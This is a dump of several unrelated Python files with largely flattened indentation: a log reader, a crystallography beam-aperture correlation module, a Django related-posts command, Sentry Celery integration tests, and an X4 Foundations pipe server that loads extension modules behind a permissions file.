log_path = StringTool.path_join(self.log_dir, work_tag.lower(), name)
if os.path.exists(log_path) is False:
log_path = StringTool.path_join(self.log_dir, name)
if os.path.exists(log_path) is False:
return False, None
s_log = os.stat(log_path)
read_seek = s_log.st_size - max_length if max_length < s_log.st_size else 0
        # Normalize the parameters
if sub_key is not None:
sub_key = StringTool.encode(sub_key)
if sub_key_prefix is not None:
sub_key_prefix = StringTool.encode(sub_key_prefix)
if StringTool.is_string(level) is False:
level = "INFO"
level = level.upper()
if level not in self.log_level:
level = "INFO"
allow_levels = self.log_level[level]
logs_list = []
last_save = False
with open(log_path, "r") as rl:
rl.seek(read_seek)
c = rl.read()
all_lines = c.split("\n")
for line in all_lines:
rl = self.log_compile.match(line)
if rl is not None:
line_sub_key = rl.groups()[0]
log_time = rl.groups()[1]
if len(line_sub_key) >= 2:
line_sub_key = line_sub_key[1:-1]
line_level = rl.groups()[2]
log_msg = rl.groups()[3]
if sub_key is not None and sub_key != line_sub_key:
last_save = False
continue
if sub_key_prefix is not None and line_sub_key.startswith(sub_key_prefix) is False:
last_save = False
continue
if line_level not in allow_levels:
last_save = False
continue
last_save = True
logs_list.append(map(StringTool.decode, [line_sub_key, log_time, line_level, log_msg]))
elif last_save is True:
logs_list[-1][3] = StringTool.join_decode([logs_list[-1][3], line])
return True, logs_list
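# Editor's illustrative sketch (not part of the original module): reading only WARNING
# and ERROR lines of a hypothetical task log (log_dir is assumed to be accepted by
# WorkerLogConfig, as in Worker.__init__ above; the paths and tags are hypothetical):
#     reader = ReadWorkerLog(log_dir="/path/to/logs")
#     found, lines = reader.read_task_log("MyWorkTag", "task-001", level="WARNING")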
|
sizecorr.py
|
'''
Created on May 15, 2018
@author: melnikov
'''
import numpy
import base64
from scipy import signal
import multiprocessing as mp
try:
from workflow_lib import workflow_logging
logger = workflow_logging.getLogger()
except:
import logging
logger = logging.getLogger("MeshBest")
def SpotMatrix(n):
profile = numpy.ones((2*n+1, 2*n+1))
for index in numpy.ndindex(numpy.shape(profile)):
j, i = index
if ((i-n)**2+(j-n)**2)>=n**2:
profile[index] = 0
return profile/numpy.sum(profile)**(0.75)
def SpotMatrix_t(n1, n2):
profile = numpy.ones((2*n1+1, 2*n2+1))
for index in numpy.ndindex(numpy.shape(profile)):
j, i = index
if (((i-n1)/n1)**2+((j-n2)/n2)**2)>=1:
profile[index] = 0
return profile/numpy.sum(profile)**(0.75)
def GenerateGaussian2D(x, y, mu, sigma):
gauss = 1/(6.28*sigma**2)*numpy.exp(-( ((x-mu[0])**2+(y-mu[1])**2) / ( 2.0 * sigma**2 ) ) )
return gauss
def BestCorr_MP(queue):
dx = size_x*1000
dy = size_y*1000
mind = min(dx, dy)
maxd = max(dx, dy)
Set = [float(x) for x in AvailableApertures if x>=mind]
while True:
Value = queue.get()
if Value == None:
break
where = numpy.where(Ztable == Value)
if len(where[0]) * len(where[1]) == 1:
# simple case of single image
xy = (float(where[1]) + 1, float(where[0]) + 1)
size = 1.0
score = (3.14/4)*mind**2*Dtable[where[0], where[1]]
ResultArray = numpy.array([[xy[0], xy[1], size, score]])
Buffer[int(Value)] = base64.b64encode(ResultArray)
else:
Xlimits = (numpy.min(where[1]), numpy.max(where[1]))
Ylimits = (numpy.min(where[0]), numpy.max(where[0]))
submatrix = numpy.zeros((Ylimits[1] - Ylimits[0] + 3, Xlimits[1] - Xlimits[0] + 3))
submatrix[1:-1, 1:-1] = Dtable[Ylimits[0]:Ylimits[1] + 1, Xlimits[0]:Xlimits[1] + 1] * \
(Ztable[Ylimits[0]:Ylimits[1] + 1, Xlimits[0]:Xlimits[1] + 1]==Value)
stretched_submatrix = numpy.zeros((numpy.shape(submatrix)[0] * 10, numpy.shape(submatrix)[1] * 10))
for index in numpy.ndindex(numpy.shape(stretched_submatrix)):
j, i = index
j = int(float(j) / int(10*dy/mind))
i = int(float(i) / int(10*dx/mind))
stretched_submatrix[index] = submatrix[j, i]
silhouette = numpy.array(stretched_submatrix>difminpar, dtype=float)
x = numpy.arange(numpy.shape(stretched_submatrix)[1])
y = numpy.arange(numpy.shape(stretched_submatrix)[0])
x, y = numpy.meshgrid(x, y)
#------------------------------------------------------------------------------------
Correlations = {}
gaussparameter = 0.25
peaks = []
for i in xrange(2):
maximums = []
for aperture in Set:
n = int(5*aperture/mind)
Corr = signal.convolve2d(silhouette, SpotMatrix(n), mode='same')
Correlations[aperture] = Corr
maximums.append(numpy.max(Corr))
# print aperture
# print numpy.max(Corr)
# plt.imshow(Corr, interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
factor = 10.0
#peaks (X, Y, size)
while True:
num = maximums.index(max(maximums))
factor = maximums[num]
if factor<2.5:
break
Peak = numpy.where(Correlations[Set[num]]==maximums[num])
peaks.append((Peak[1][0], Peak[0][0], Set[num]))
silhouette = silhouette - ((x-Peak[1][0])**2+(y-Peak[0][0])**2<=((10/mind)*Set[num]/2.0)**2)
silhouette[silhouette!=1] = 0
# plt.imshow(silhouette, interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
for aperture in Set:
subtr = maximums[num]*6.28*((Set[num]/(gaussparameter*mind))**2)*GenerateGaussian2D(x, y, (Peak[1][0], Peak[0][0]), sigma=Set[num]/(gaussparameter*mind))
Correlations[aperture] = Correlations[aperture]-subtr
maximums.append(numpy.max(Correlations[aperture]))
# plt.imshow(Correlations[aperture], interpolation='nearest', cmap='hot')
# plt.colorbar()
# plt.show()
maximums = maximums[len(Set):]
#-----------------------------------------------------------------------------
ResultArray = numpy.zeros((len(peaks), 4))
for n in xrange(len(peaks)):
X = peaks[n][0]/(10.0*(dx/mind)) + Xlimits[0] - 0.5
Y = peaks[n][1]/(10.0*(dy/mind)) + Ylimits[0] - 0.5
size = peaks[n][2]/mind
ResultArray[n, :3] = numpy.array([X, Y, size])
ResultArray[n, 3] = (peaks[n][2]/10.0)**2*numpy.sum(numpy.multiply(stretched_submatrix, ((x-peaks[n][0])**2+(y-peaks[n][1])**2<=((10/mind)*peaks[n][2]/2.0)**2)))
if Value==-2:
ResultArray[n, 3] = ResultArray[n, 3]/100.0
Buffer[int(Value)] = base64.b64encode(ResultArray)
def GetAllPositions(jsondata):
global Buffer, Dtable, Ztable, difminpar, AvailableApertures, size_x, size_y
try:
Dtable = jsondata['MeshBest']['Dtable']
Ztable = jsondata['MeshBest']['Ztable']
except KeyError:
logger.error('jsondata misses precedent MeshBest steps')
return None
difminpar = jsondata['MeshBest']['difminpar']
size_x = jsondata['grid_info']['beam_width']
size_y = jsondata['grid_info']['beam_height']
AvailableApertures = jsondata['beamlineInfo']['beamlineApertures']
manager = mp.Manager()
Buffer = manager.dict()
nCPU = mp.cpu_count()
queue = mp.Queue()
for Value in numpy.unique(Ztable[Ztable!=-1]):
queue.put(Value)
for item in xrange(nCPU):
queue.put(None)
workers = []
for item in xrange(nCPU):
worker = mp.Process(target=BestCorr_MP, args=(queue,))
workers.append(worker)
worker.start()
for worker in workers:
worker.join()
BestPositions = numpy.empty((0, 4), float)
for Value in numpy.unique(Ztable[Ztable!=-1]):
ApertureCorrArray = numpy.fromstring(base64.b64decode(Buffer[Value]))
ApertureCorrArray = ApertureCorrArray.reshape(len(ApertureCorrArray)/4, 4)
BestPositions = numpy.append(BestPositions, ApertureCorrArray, axis=0)
# print '*******\n', BestPositions, '*******\n'
BestPositions = BestPositions[BestPositions[:, 3].argsort()][::-1]
jsondata['MeshBest']['BestPositions'] = base64.b64encode(numpy.ascontiguousarray(BestPositions))
numpy.savetxt('Result_BestPositions.txt', BestPositions, fmt='%0.2f')
|
updateRelation.py
|
import json
from django.core.management.base import BaseCommand
from django.db import transaction
from postdb.models import *
from thulac import thulac
import threading, queue
thu = thulac(seg_only=True, rm_space=True)
cnt_thread = 10
timeout = 10
q = queue.Queue()
mutex = threading.Lock()
class Command(BaseCommand):
def is_biaodian(self, x):
if x == '——':
return True
return x in r''',。、;‘【】、·—《》?:“{}|,./;'[]\=-`<>?:"{}|_+~'''
@transaction.atomic
def go(self):
all = PostInfo.objects.all().values_list('NID', 'title', 'TID')
cnt = 0
l = len(all)
index_all = IndexInfo.objects.all()
ci_all = {}
ps_all = {}
for t in index_all:
ci_all[t.key] = json.loads(t.value)
for t in all:
ps_all[t[0]] = {'title': t[1], 'TID': t[2]}
def work():
nonlocal cnt, l, ci_all, ps_all
            while not q.empty():
                try:
                    # use the module-level timeout so a worker exits instead of blocking
                    # forever if another thread drains the queue first
                    NID, title = q.get(timeout=timeout)
                except queue.Empty:
                    break
                mutex.acquire()
                cnt += 1
                print('count {} / {}'.format(cnt, l))
                mutex.release()
ci = thu.cut(' '.join(title.split()))
res = dict()
for x in ci:
if self.is_biaodian(x[0]):
continue
try:
arr = ci_all[x[0]]
for _ in arr:
if _[1] == NID:
continue
if res.get(_[1]):
res[_[1]] += _[0]
else:
res[_[1]] = _[0]
except Exception as e:
pass
mx_limit = 3
ans = []
for (x, y) in res.items():
if len(ans) < mx_limit:
ans.append([x, y])
else:
mn = 0
for j in range(1, mx_limit):
if ans[j][1] < ans[mn][1]:
mn = j
if y > ans[mn][1]:
ans[mn] = [x, y]
ans.sort(key=lambda x: x[1], reverse=True)
ans = [ps_all[ans[i][0]] for i in range(len(ans))]
ans = json.dumps(ans)
obj = None
try:
obj = PostRelation.objects.get(NID=NID)
obj.relation = ans
obj.save()
except Exception as e:
PostRelation.objects.create(NID=NID, relation=ans)
q.task_done()
for t in all:
q.put((t[0], t[1]))
for i in range(cnt_thread):
            threading.Thread(target=work).start()  # pass the function itself; calling work() here would run it in the main thread
q.join()
def handle(self, *args, **options):
self.go()
|
test_celery.py
|
import threading
import pytest
pytest.importorskip("celery")
from sentry_sdk import Hub, configure_scope
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk._compat import text_type
from celery import Celery, VERSION
from celery.bin import worker
@pytest.fixture
def connect_signal(request):
def inner(signal, f):
signal.connect(f)
request.addfinalizer(lambda: signal.disconnect(f))
return inner
@pytest.fixture
def init_celery(sentry_init):
def inner(propagate_traces=True, **kwargs):
sentry_init(
integrations=[CeleryIntegration(propagate_traces=propagate_traces)],
**kwargs
)
celery = Celery(__name__)
if VERSION < (4,):
celery.conf.CELERY_ALWAYS_EAGER = True
else:
celery.conf.task_always_eager = True
return celery
return inner
@pytest.fixture
def celery(init_celery):
return init_celery()
@pytest.fixture(
params=[
lambda task, x, y: (task.delay(x, y), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (task.apply_async((x, y)), {"args": [x, y], "kwargs": {}}),
lambda task, x, y: (
task.apply_async(args=(x, y)),
{"args": [x, y], "kwargs": {}},
),
lambda task, x, y: (
task.apply_async(kwargs=dict(x=x, y=y)),
{"args": [], "kwargs": {"x": x, "y": y}},
),
]
)
def celery_invocation(request):
"""
Invokes a task in multiple ways Celery allows you to (testing our apply_async monkeypatch).
Currently limited to a task signature of the form foo(x, y)
"""
return request.param
def test_simple(capture_events, celery, celery_invocation):
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task(x, y):
foo = 42 # noqa
return x / y
with Hub.current.start_span() as span:
celery_invocation(dummy_task, 1, 2)
_, expected_context = celery_invocation(dummy_task, 1, 0)
event, = events
assert event["contexts"]["trace"]["trace_id"] == span.trace_id
assert event["contexts"]["trace"]["span_id"] != span.span_id
assert event["transaction"] == "dummy_task"
assert event["extra"]["celery-job"] == dict(
task_name="dummy_task", **expected_context
)
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
assert exception["mechanism"]["type"] == "celery"
assert exception["stacktrace"]["frames"][0]["vars"]["foo"] == "42"
@pytest.mark.parametrize("task_fails", [True, False], ids=["error", "success"])
def test_transaction_events(capture_events, init_celery, celery_invocation, task_fails):
celery = init_celery(traces_sample_rate=1.0)
@celery.task(name="dummy_task")
def dummy_task(x, y):
return x / y
# XXX: For some reason the first call does not get instrumented properly.
celery_invocation(dummy_task, 1, 1)
events = capture_events()
with Hub.current.start_span(transaction="submission") as span:
celery_invocation(dummy_task, 1, 0 if task_fails else 1)
if task_fails:
error_event = events.pop(0)
assert error_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert error_event["exception"]["values"][0]["type"] == "ZeroDivisionError"
execution_event, submission_event = events
assert execution_event["transaction"] == "dummy_task"
assert submission_event["transaction"] == "submission"
assert execution_event["type"] == submission_event["type"] == "transaction"
assert execution_event["contexts"]["trace"]["trace_id"] == span.trace_id
assert submission_event["contexts"]["trace"]["trace_id"] == span.trace_id
if task_fails:
assert execution_event["contexts"]["trace"]["status"] == "failure"
else:
assert "status" not in execution_event["contexts"]["trace"]
assert execution_event["spans"] == []
assert submission_event["spans"] == [
{
u"description": u"dummy_task",
u"op": "celery.submit",
u"parent_span_id": submission_event["contexts"]["trace"]["span_id"],
u"same_process_as_parent": True,
u"span_id": submission_event["spans"][0]["span_id"],
u"start_timestamp": submission_event["spans"][0]["start_timestamp"],
u"timestamp": submission_event["spans"][0]["timestamp"],
u"trace_id": text_type(span.trace_id),
}
]
def test_no_stackoverflows(celery):
"""We used to have a bug in the Celery integration where its monkeypatching
was repeated for every task invocation, leading to stackoverflows.
See https://github.com/getsentry/sentry-python/issues/265
"""
results = []
@celery.task(name="dummy_task")
def dummy_task():
with configure_scope() as scope:
scope.set_tag("foo", "bar")
results.append(42)
for _ in range(10000):
dummy_task.delay()
assert results == [42] * 10000
with configure_scope() as scope:
assert not scope._tags
def test_simple_no_propagation(capture_events, init_celery):
celery = init_celery(propagate_traces=False)
events = capture_events()
@celery.task(name="dummy_task")
def dummy_task():
1 / 0
with Hub.current.start_span() as span:
dummy_task.delay()
event, = events
assert event["contexts"]["trace"]["trace_id"] != span.trace_id
assert event["transaction"] == "dummy_task"
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
def test_ignore_expected(capture_events, celery):
events = capture_events()
@celery.task(name="dummy_task", throws=(ZeroDivisionError,))
def dummy_task(x, y):
return x / y
dummy_task.delay(1, 2)
dummy_task.delay(1, 0)
assert not events
def test_broken_prerun(init_celery, connect_signal):
from celery.signals import task_prerun
stack_lengths = []
def crash(*args, **kwargs):
# scope should exist in prerun
stack_lengths.append(len(Hub.current._stack))
1 / 0
# Order here is important to reproduce the bug: In Celery 3, a crashing
# prerun would prevent other preruns from running.
connect_signal(task_prerun, crash)
celery = init_celery()
assert len(Hub.current._stack) == 1
@celery.task(name="dummy_task")
def dummy_task(x, y):
stack_lengths.append(len(Hub.current._stack))
return x / y
if VERSION >= (4,):
dummy_task.delay(2, 2)
else:
with pytest.raises(ZeroDivisionError):
dummy_task.delay(2, 2)
assert len(Hub.current._stack) == 1
if VERSION < (4,):
assert stack_lengths == [2]
else:
assert stack_lengths == [2, 2]
@pytest.mark.xfail(
(4, 2, 0) <= VERSION,
strict=True,
reason="https://github.com/celery/celery/issues/4661",
)
def test_retry(celery, capture_events):
events = capture_events()
failures = [True, True, False]
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
try:
if failures.pop(0):
1 / 0
except Exception as exc:
self.retry(max_retries=2, exc=exc)
dummy_task.delay()
assert len(runs) == 3
assert not events
failures = [True, True, True]
runs = []
dummy_task.delay()
assert len(runs) == 3
event, = events
exceptions = event["exception"]["values"]
for e in exceptions:
assert e["type"] == "ZeroDivisionError"
@pytest.mark.skipif(VERSION < (4,), reason="in-memory backend broken")
def test_transport_shutdown(request, celery, capture_events_forksafe, tmpdir):
events = capture_events_forksafe()
celery.conf.worker_max_tasks_per_child = 1
celery.conf.broker_url = "memory://localhost/"
celery.conf.broker_backend = "memory"
celery.conf.result_backend = "file://{}".format(tmpdir.mkdir("celery-results"))
celery.conf.task_always_eager = False
runs = []
@celery.task(name="dummy_task", bind=True)
def dummy_task(self):
runs.append(1)
1 / 0
res = dummy_task.delay()
w = worker.worker(app=celery)
t = threading.Thread(target=w.run)
t.daemon = True
t.start()
with pytest.raises(Exception):
# Celery 4.1 raises a gibberish exception
res.wait()
event = events.read_event()
exception, = event["exception"]["values"]
assert exception["type"] == "ZeroDivisionError"
events.read_flush()
# if this is nonempty, the worker never really forked
assert not runs
|
Main.py
|
'''
Main entry function for the overall python based server.
This will load in individual pipe sub-servers and run their threads.
Initial version just runs a test server.
'''
'''
Note on security:
Loading arbitrary python code can be unsafe. As a light protection,
the pipe server will only load modules that are part of extensions
that have been given explicit permission to run python.
Permissions will be held in a json file, holding the extension id
(from content.xml) and its permission state (generally true).
A special exception will be made for the modding api's id, so it can
load without permission set up.
The permission file will be generated if it doesn't already exist,
but otherwise is left untouched to avoid overwriting user settings.
The general idea is that, if some random extension added a python
plugin to be loaded which may be unsafe, by default it will be rejected
until the user of that extension gives it explicit permission.
TODO: maybe use multiprocessing instead of threading.
TODO: think of a safe, scalable way to handle restarting threads,
particularly subthreads that a user server thread may have started,
which might get orphaned when that thread function exceptions out
on pipe closure. (Currently pipe servers are responsible for
restarting their own subthreads.)
TODO: rethink server restart behavior; perhaps they should not auto-restart,
but instead be fully killed when the x4 pipe closes, and then only
restarted when x4 MD api requests the restart. In this way, mods can change
their python side code on the fly, reload their save, and the new code
would get loaded.
(The md api would need to re-announce servers whenever the game or ui reloads,
as well as whenever the server resets.)
(Perhaps this is less robust in some way?)
(Manual effort needed to clean out the imported packages, similar to what
is done in some gui code for rerunning scripts.)
Overall, it is probably reasonably easy for developers to just shut down
this host server and restart it, if they want to update their server code;
x4 side should automatically reconnect.
temp copy of test args:
-t -x "C:\Steam\steamapps\common\X4 Foundations" -m "extensions\sn_measure_perf\python\Measure_Perf.py"
'''
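# Editor's illustrative sketch (not part of the original file): the permissions file
# described above maps extension ids (from content.xml) to a boolean; the exact schema
# accepted by Load_Permissions() is assumed here, e.g.
#
#     {
#         "sn_measure_perf": true,
#         "some_other_extension": false
#     }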
# Manually list the version for now, since packed exe won't have
# access to the change_log.
version = '1.2'
# Setup include path to this package.
import sys
import json
from pathlib import Path
from collections import defaultdict
import argparse
import time
# To support packages cross-referencing each other, set up this
# top level as a package, findable on the sys path.
# Extra 'frozen' stuff is to support pyinstaller generated exes.
# Note:
# Running from python, home_path is X4_Projects (or whatever the parent
# folder to this package is).
# Running from exe, home_path is the folder with the exe itself.
# In either case, main_path will be to Main.py or the exe.
if getattr(sys, 'frozen', False):
# Note: _MEIPASS gets the directory the packed exe unpacked into,
# eg. in appdata/temp. Need 'executable' for the original exe path.
home_path = Path(sys.executable).parent
main_path = home_path
else:
home_path = Path(__file__).resolve().parents[1]
main_path = Path(__file__).resolve().parent
if str(home_path) not in sys.path:
sys.path.append(str(home_path))
#from X4_Python_Pipe_Server.Servers import Test1
#from X4_Python_Pipe_Server.Servers import Send_Keys
from X4_Python_Pipe_Server.Classes import Server_Thread
from X4_Python_Pipe_Server.Classes import Pipe_Server, Pipe_Client
from X4_Python_Pipe_Server.Classes import Client_Garbage_Collected
import win32api
import winerror
import win32file
import win32pipe
import threading
import traceback
# Note: in other projects importlib.machinery could be used directly,
# but appears to be failing when pyinstalling this package, so do
# a more directly import of machinery.
from importlib import machinery
# Flag to use during development, for extra exception throws.
developer = False
# Use a python test client, instead of needing x4 open.
# Note: putting breakpoints on tested modules requires opening them from
# their extension folder path, not their git repo path that was symlinked over.
test_python_client = 0
# Name of the host pipe.
pipe_name = 'x4_python_host'
# Loaded permissions from pipe_permissions.json.
permissions = None
# Permissions can be placed alongside the exe or Main.py.
# Or maybe in current working directory?
# Go with the exe/main directory.
permissions_path = main_path / 'permissions.json'
def Main():
'''
Launch the server. This generally does not return.
'''
# Set up command line arguments.
argparser = argparse.ArgumentParser(
description = ('Host pipe server for X4 interprocess communication.'
' This will launch extension python modules that are'
' registered by the game through the pipe api.'),
)
argparser.add_argument(
'-p', '--permissions-path',
default = None,
help = 'Optional path to a permissions.json file specifying which'
' extensions are allowed to load modules. If not given, the'
' main server directory is used.' )
argparser.add_argument(
'-t', '--test',
action='store_true',
help = 'Puts this server into test mode. Requires following args:'
' --x4-path, --test_module' )
argparser.add_argument(
'-x', '--x4-path',
default = None,
metavar = 'Path',
help = 'Path to the X4 installation folder. Only needed in test mode.')
argparser.add_argument(
'-m', '--module',
default = None,
help = 'Path to a specific python module to run in test mode,'
' relative to the x4-path.' )
#argparser.add_argument(
# '-v', '--verbose',
# action='store_true',
# help = 'Print extra messages.' )
args = argparser.parse_args(sys.argv[1:])
if args.permissions_path:
global permissions_path
permissions_path = Path.cwd() / (Path(args.permissions_path).resolve())
# The directory should exist.
if not permissions_path.parent.exists():
print('Error: permissions_path directory not found')
return
# Check if running in test mode.
if args.test:
global test_python_client
test_python_client = True
if not args.x4_path:
print('Error: x4_path required in test mode')
return
if not args.module:
print('Error: module required in test mode')
return
# Make x4 path absolute.
args.x4_path = Path.cwd() / (Path(args.x4_path).resolve())
if not args.x4_path.exists():
print('Error: x4_path invalid: {}'.format(args.x4_path))
return
# Keep module path relative.
args.module = Path(args.module)
module_path = args.x4_path / args.module
if not module_path.exists():
print('Error: module invalid: {}'.format(module_path))
return
# List of directly launched threads.
threads = []
# List of relative path strings received from x4, to python server
# modules that have been loaded before.
module_relpaths = []
print('X4 Python Pipe Server v{}\n'.format(version))
# Load permissions, if the permissions file found.
Load_Permissions()
# Put this into a loop, to keep rebooting the server when the
# pipe gets disconnected (eg. x4 loaded a save).
shutdown = False
while not shutdown:
# Start up the baseline control pipe, listening for particular errors.
# TODO: maybe reuse Server_Thread somehow, though don't actually
# want a separate thread for this.
try:
pipe = Pipe_Server(pipe_name)
# For python testing, kick off a client thread.
if test_python_client:
# Set up the reader in another thread.
reader_thread = threading.Thread(target = Pipe_Client_Test, args = (args,))
reader_thread.start()
# Wait for client.
pipe.Connect()
# Clear out any old x4 path; the game may have shut down and
# relaunched from a different location.
x4_path = None
# Listen to runtime messages, announcing relative paths to
# python modules to load from extensions.
while 1:
message = pipe.Read()
print('Received: ' + message)
# A ping will be sent first, testing the pipe from x4 side.
if message == 'ping':
pass
# Handle restart requests similar to pipe disconnect exceptions.
elif message == 'restart':
raise Reset_Requested()
elif message.startswith('package.path:'):
message = message.replace('package.path:','')
# Parse into the base x4 path.
# Example return:
# ".\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?\init.lua;"
# Split and convert to proper Paths.
paths = [Path(x) for x in message.split(';')]
# Search for a wanted path.
x4_path = None
for path in paths:
# Different ways to possibly do this.
# This approach will iterate through parents to find the
# "lua" folder, then get its parent.
# (The folder should not be assumed to match the default
# x4 installation folder name, since a user may have
# changed it if running multiple installs.)
test_path = path
# Loop while more parents are present.
while test_path.parents:
# Check the parent.
test_path = test_path.parent
if test_path.stem == "lua":
x4_path = test_path.parent
break
# Stop looping once an x4_path found.
if x4_path:
break
elif message.startswith('modules:'):
message = message.replace('modules:','')
# If no x4_path yet seen, ignore.
if not x4_path:
continue
# Break apart the modules. Semicolon separated, with an
# ending separator.
# This list will end with an empty entry, even if the message
# has no paths, so can throw away the last list item.
module_paths = [Path(x) for x in message.split(';')[:-1]]
# Handle each path.
for module_path in module_paths:
# If this module has already been processed, ignore it.
# This will happen when x4 reloads saves and such, and all
# md scripts re-announce their server files.
if module_path in module_relpaths:
print('Module was already loaded: {}'.format(module_path))
continue
# Put together the full path.
full_path = x4_path / module_path
# Check if this module is part of an extension
# that has permission to run, and skip if not.
if not Check_Permission(x4_path, module_path):
continue
# Record this path as seen.
module_relpaths.append(module_path)
# Import the module.
module = Import(full_path)
# Pull out the main() function.
main = getattr(module, 'main', None)
# Start the thread.
if main != None:
thread = Server_Thread(module.main, test = test_python_client)
threads.append(thread)
else:
print('Module lacks "main()": {}'.format(module_path))
except (win32api.error, Client_Garbage_Collected) as ex:
# win32api.error exceptions have the fields:
# winerror : integer error code (eg. 109)
# funcname : Name of function that errored, eg. 'ReadFile'
# strerror : String description of error
# If just in testing mode, assume the tests completed and
# shut down.
if test_python_client:
print('Stopping test.')
shutdown = True
elif isinstance(ex, Client_Garbage_Collected):
print('Pipe client garbage collected, restarting.')
# If another host was already running, there will have been
# an error when trying to set up the pipe.
elif ex.funcname == 'CreateNamedPipe':
print('Pipe creation error. Is another instance already running?')
shutdown = True
# If X4 was reloaded, this results in a ERROR_BROKEN_PIPE error
# (assuming x4 lua was wrestled into closing its pipe properly
# on garbage collection).
# Update: as of x4 3.0 or so, garbage collection started crashing
# the game, so this error is only expected when x4 shuts down
# entirely.
elif ex.winerror == winerror.ERROR_BROKEN_PIPE:
# Keep running the server.
print('Pipe client disconnected.')
# This should now loop back and restart the pipe, if
# shutdown wasn't set.
if not shutdown:
print('Restarting host.')
except Exception as ex:
# Any other exception, reraise for now.
raise ex
finally:
# Close the pipe if open.
# This will error if the exit condition was a CreateNamedPipe
# error, so just wrap it for safety.
try:
pipe.Close()
except Exception as ex:
pass
# Let subthreads keep running; they internally loop.
#if threads:
# print('Shutting down subthreads.')
## Close all subthreads.
#for thread in threads:
# thread.Close()
## Wait for closures to complete.
#for thread in threads:
# thread.Join()
#base_thread = Server_Thread(Control)
# TODO: dynamically load in server modules from extensions.
# Need to check which extensions are enabled/disabled, and determine
# what the protocol will be for file naming.
#-Removed; old test code for hardcoded server paths.
## Start all server threads.
## Just a test for now.
#threads = [
# Server_Thread(Test1.main),
# Server_Thread(Send_Keys.main),
#]
## Wait for them all to finish.
#for thread in threads:
# thread.Join()
return
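# Hedged usage example (comments only; nothing here executes): the arguments
# parsed above can be combined to exercise a single extension module in test
# mode. Both paths below are placeholders, not a real install or extension.
#
#   python Main.py --test --x4-path "C:/Games/X4 Foundations" --module "extensions/my_extension/python/server.py"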
def Import(full_path):
'''
Code for importing a module, broken out for convenience.
'''
try:
# Attempt to load/run the module.
module = machinery.SourceFileLoader(
# Provide the name sys will use for this module.
# Use the basename to get rid of any path, and prefix
# to ensure the name is unique (don't want to collide
# with other loaded modules).
'user_module_' + full_path.name.replace(' ','_'),
            # Full path to the module file to load.
str(full_path)
).load_module()
print('Imported {}'.format(full_path))
except Exception as ex:
module = None
# Make a nice message, to prevent a full stack trace being
# dropped on the user.
print('Failed to import {}'.format(full_path))
print('Exception of type "{}" encountered.\n'.format(
type(ex).__name__))
ex_text = str(ex)
if ex_text:
print(ex_text)
# In dev mode, print the exception traceback.
if developer:
print(traceback.format_exc())
# Raise it again, just in case vs can helpfully break
# at the problem point. (This won't help with the gui up.)
raise ex
#else:
# Print('Enable developer mode for exception stack trace.')
return module
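# Hedged sketch, not called by the server: SourceFileLoader.load_module() used
# above is deprecated in recent Python releases; an importlib.util based
# equivalent would look roughly like the helper below. The helper name is
# illustrative only.
def Import_Spec_Sketch(full_path):
    '''
    Illustrative alternative to Import() based on importlib.util.
    '''
    import importlib.util
    name = 'user_module_' + full_path.name.replace(' ', '_')
    spec = importlib.util.spec_from_file_location(name, str(full_path))
    module = importlib.util.module_from_spec(spec)
    # Executing the spec runs the module's top-level code, which is what
    # load_module() did implicitly.
    spec.loader.exec_module(module)
    return module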
def Load_Permissions():
'''
Loads the permissions json file, or creates one if needed.
'''
global permissions
if permissions_path.exists():
try:
with open(permissions_path, 'r') as file:
permissions = json.load(file)
print('Loaded permissions file at {}\n'.format(permissions_path))
except Exception as ex:
print('Error when loading permissions file')
# If nothing was loaded, write (or overwrite) the default permissions file.
if permissions == None:
permissions = {
'instructions': 'Set which extensions are allowed to load modules,'
' based on extension id (in content.xml).',
# Workshop id of the mod support apis.
'ws_2042901274' : True,
}
print('Generating default permissions file at {}\n'.format(permissions_path))
with open(permissions_path, 'w') as file:
json.dump(permissions, file, indent = 2)
return
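# Hedged example, not called anywhere: granting permission to an extension by
# adding its id to the json file generated above. The id below is a
# placeholder; real ids come from each extension's content.xml.
def Enable_Permission_Sketch(content_id = 'my_extension_id'):
    '''
    Illustrative helper showing the permissions.json layout.
    '''
    data = json.loads(permissions_path.read_text())
    data[content_id] = True
    permissions_path.write_text(json.dumps(data, indent = 2))
    return data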
def Check_Permission(x4_path, module_path):
'''
Check if the module on the given path has permission to run.
Return True if permitted, else False with a printed message.
'''
try:
# Find the extension's root folder.
if not module_path.as_posix().startswith('extensions/'):
raise Exception('Module is not in extensions')
# The module_path should start with 'extensions', so find the
# second folder.
        # (Note: pathlib is dumb and doesn't allow negative indices on parents.)
ext_dir = x4_path / [x for x in module_path.parents][-3]
# Load the content.xml. Can do xml or raw text; text should
# be good enough for now (avoid adding lxml to the exe).
content_text = (ext_dir / 'content.xml').read_text()
# The first id="..." should be the extension id.
content_id = content_text.split('id="')[1].split('"')[0]
# Check its permission.
if permissions.get(content_id) == True:
return True
print('\n'.join([
'',
'Rejecting module due to missing permission:',
' content_id: {}'.format(content_id),
' path: {}'.format(x4_path / module_path),
'To allow loading, enable this content_id in {}'.format(permissions_path),
'',
]))
return False
except Exception as ex:
print('\n'.join([
'',
'Rejecting module due to error during extension id permission check:',
' path: {}'.format(x4_path / module_path),
'{}: {}'.format(type(ex).__name__, ex if str(ex) else 'Unspecified'),
'',
]))
return False
def Pipe_Client_Test(args):
'''
Function to mimic the x4 client.
'''
pipe = Pipe_Client(pipe_name)
if not args.x4_path or not args.x4_path.exists():
raise Exception('Test error: invalid x4 path')
# Example lua package path.
#package_path = r".\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?.lua;C:\Steam\steamapps\common\X4 Foundations\lua\?\init.lua;"
package_path = r".\?.lua;{0}\lua\?.lua;{0}\lua\?\init.lua;".format(args.x4_path)
# Announce the package path.
pipe.Write("package.path:" + package_path)
# Announce module relative paths.
# Just one test module for now.
# Give as_posix style.
modules = [
args.module.as_posix(),
]
# Separated with ';', end with a ';'.
message = ';'.join(modules) + ';'
pipe.Write("modules:" + message)
# Keep-alive blocking read.
pipe.Read()
return
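# For reference, the message formats the server loop in Main() understands,
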